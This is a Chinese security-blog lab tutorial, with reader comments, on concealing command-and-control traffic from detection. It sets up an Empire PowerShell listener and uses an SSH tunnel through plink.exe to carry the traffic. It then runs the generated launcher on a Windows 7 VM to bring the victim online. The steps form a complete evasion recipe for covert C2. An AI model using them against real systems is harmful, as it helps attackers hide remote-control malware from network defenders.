*嚴正聲明:本文僅限於技術討論與分享,嚴禁用於非法途徑。
一、背景簡介
在網絡攻防博弈中,網絡流量特徵分析類安全防禦措施得到了廣泛應用。衆多廠商和企業對網絡流量進行惡意流量分析檢測,從而針對性的採取防禦措施,如各級ISP在骨幹網絡設備上大多采用網絡流量分析檢測的防禦方案。
本文想通過標準的SSH的端口轉發建立SSH形式的加密隧道,用於加密、隱蔽傳輸惡意流量,從而避免通過流量檢測發現惡意行爲。復現實驗部分以 C&C通信流量爲例進入實驗。通過SSH隧道進行加密和隱藏的C&C流量在外部流量特徵分析僅表現爲標準SSH流量。
二、實驗原理
本次實驗使用Empire工具快速搭建C&C信道,本文只簡要介紹對於Empire工具。在Windows平臺下使用Plink.exe工具的SSH功能搭建SSH隧道。
2.1 SSH隧道介紹
SSH 會自動加密和解密所有 SSH 客戶端與服務端之間的網絡數據。但是, SSH 還能夠將其他 TCP 端口的網絡數 據通過 SSH 鏈接來轉發,並且自動提供了相應的加密及解密服務。這一過程也被叫做“隧道”( tunneling),這是因 爲 SSH 爲其他 TCP 鏈接提供了一個安全的通道來進行傳輸而得名。SSH隧道的實現主要使用SSH的參數配置進行端 口轉發,即將所需傳輸的數據內容通過加密的SSH隧道進行轉發。 SSH 端口轉發能夠提供兩大功能:1、加密 SSH Client 端至 SSH Server 端之間的通訊數據。2、突破防火牆的限制完成一些之前無法建立的 TCP 連接。
由於SSH的安全性,在數據跨越公網時其他人無法得知數據內容。SSH端口轉發有本地轉發、遠程轉發和動態端 口轉發三種。本次實驗主要以本地轉發爲例。本地轉發主要使用SSH的 -L參數解釋:
(2) 第2部分表示:通訊數據會從本地的9906端口上被轉發,最終被轉發到10.1.0.2的3306端口。
(3) 第3部分表示:我們創建的ssh隧道是連接到10.1.0.2上的root用戶。
2.2 Empire工具簡介
Empire是一個針對windows平臺、提供從Stager生成到提取和滲透維持一系列功能齊全的滲透攻擊框架,其最 大的特點是以PowerShell腳本作爲攻擊載荷,而且Empire實現了無需powershell.exe就可運行PowerShell代理功 能,即它是一個純粹的PowerShell後期漏洞利用代理工具。快速部署後期漏洞利用模塊,內置模塊有鍵盤記錄、 Mimikatz、繞過UAC、內網掃描等等,並且能夠適應通信躲避網絡檢測和大部分安全防護工具的查殺,簡單來說 Empire類似於滲透神器Metasploit,是一個基於PowerShell的遠程控制木馬。
2.2 Empire工具安裝
在實驗虛擬linux系統中安裝
git clone https://github.com/EmpireProject/Empire.git #進入setup目錄進行命令行安裝
cd Empire
cd setup
sudo ./install.sh
安裝成功後,確認Empire目錄下所有文件(目錄)如下圖:
三、實驗步驟
實驗說明:使用兩臺虛擬機ubuntu16 + windows 7,其中ubuntu16模擬控制端,windows 7模擬受控主機。
3.1 在ubuntu系統上搭建SSH服務端
(1) 安裝Open-SSH Server端
sudo apt-get install openssh-server
(2) 配置SSH Server端
編輯/etc/ssh/sshd_config文件中允許口令登錄PermitRootLogin配置如下圖:
(3) 測試SSH登錄是否成功
查看本機IP(linux命令:ifconfig),如在windows下的XShell工具下輸入Server IP 輸入登錄名和密碼,成功登入系統則SSH Server端搭建成功。
(4) 配置RSA密鑰對認證登錄
a) 生成rsa密鑰對
ssh-keygen -t rsa
b) 開啓sshd支持RSA認證選項,並添加認證公鑰路徑地址
c) 編輯/etc/ssh/sshd_config文件中的PubkeyAuthentication選項配置爲yes,即:
ssh-copy-id -i id_rsa.pub 主機登錄用戶名@192.168.81.137
e) 使用私鑰進行登錄ssh登錄
ssh -i 私鑰路徑 主機登錄用戶名@192.168.81.137
注:使用putty、winscp等工具時需要先使用對應平臺工具進行rsa私鑰導入後轉化爲相對應文件格式,如本次實驗使用putty工具導入生成私鑰文件sshrsa.ppk。
3.2 使用Empire工具生成PowerShell腳本備用
Empire工具類似Metasploit,詳細使用教程可參考一篇文章精通PowerShell Empire。
本次實驗使用Empire生成簡單的PowerShell腳本,建立最簡單的C&C通信。下面簡單概括主要步驟。
(1) 設置監聽
listeners #進入的界面下可輸入list查看以設置的監聽
uselistener http #輸入 info查看必填參數
set Name 4444 #本次實驗通過SSH隧道通信,因此設置監聽127.0.0.1:4444
set Port 4444
set Host 127.0.0.1
execute #創建命爲4444的監聽,監聽127.0.0.1:4444上通信數據
示例如下:
launcher powershell 4444 # 4444爲設置的監聽名字
#可進入tagers生成其他木馬、遠控程序,本次實驗直接生成最簡單PowerShell利用腳本
注:生成的Powershell代碼直接複製並保存,以備在受控windows主機(win7、win10)執行。
3.3 搭建SSH隧道
(1) windows下使用Plink.exe(putty工具集中可以在windows系統下使用命令行進行SSH連接)連接SSH
Server
#需要首先進入Plink.exe文件所在路徑
Plink.exe -ssh -l 登錄用戶名 -pw 登錄密碼 SSH主機IP
(2) Plink相關參數
-ssh 指定使用特定連接協議
-l 指定登錄用戶名
-i 指定RSA私鑰登錄
-L 本地轉發
(3) Plink端口轉發設計
plink.exe -ssh -i sshrsa.ppk [email protected] -L 4444:192.168.81.137:4444
將本地端口(4444)轉發到遠程目標主機(192.168.81.137)的目標端口(4444)。
注意:以上命令執行成功後,需要保持命令行不要關閉。同時可以組合使用SSH的其他參數進行後臺運行、不交互等。
(4) 使用(2)中生成的PowerShell腳本,使受控主機上線
a) windows 7虛擬機另外開啓一個CMD窗口,複製PowerShell腳本執行。可以看到受控主機以上線。
四、總結
通過本次實驗可以看出,攻擊者可以利用類似SSH的公共服務或可用技術輔助攻擊,且其實現也非常容易。
關鍵步驟總結:
(1) 搭建SSH服務,並配置爲RSA私鑰登錄(也可以配置爲免密登錄)。
(2) 使用工具(如Empire、Metasploit等)構建C&C。
(3) 利用SSH的端口轉發搭建SSH隧道。
(4) 配置C&C和SSH參數使二者配合實現加密、隱藏惡意流量的目的。
本文思想源於FreeBuf大神”興趣使然的小胃”,特此感謝。
*本文作者:mumufeng06,本文屬 FreeBuf 原創獎勵計劃,未經許可禁止轉載。
mumufeng06 1 篇文章 等級: 1級
|
|
已有 4 條評論
-
shareWAF.com 2019-07-19 回覆 1樓
寫的不錯!
亮了(0)
-
mumufeng06 (1級) 廣州大學“方濱興班”一期碩士在讀——網絡空間先進技術研究院。... 2019-07-19 回覆
@ shareWAF.com 謝謝!
亮了(1)
-
-
Sudo 2019-07-19 回覆 2樓
收藏了,有機會實踐一下
亮了(0)
-
mumufeng06 (1級) 廣州大學“方濱興班”一期碩士在讀——網絡空間先進技術研究院。... 2019-07-19 回覆
@ Sudo 全文皆基於實驗,歡迎一起探討。
-
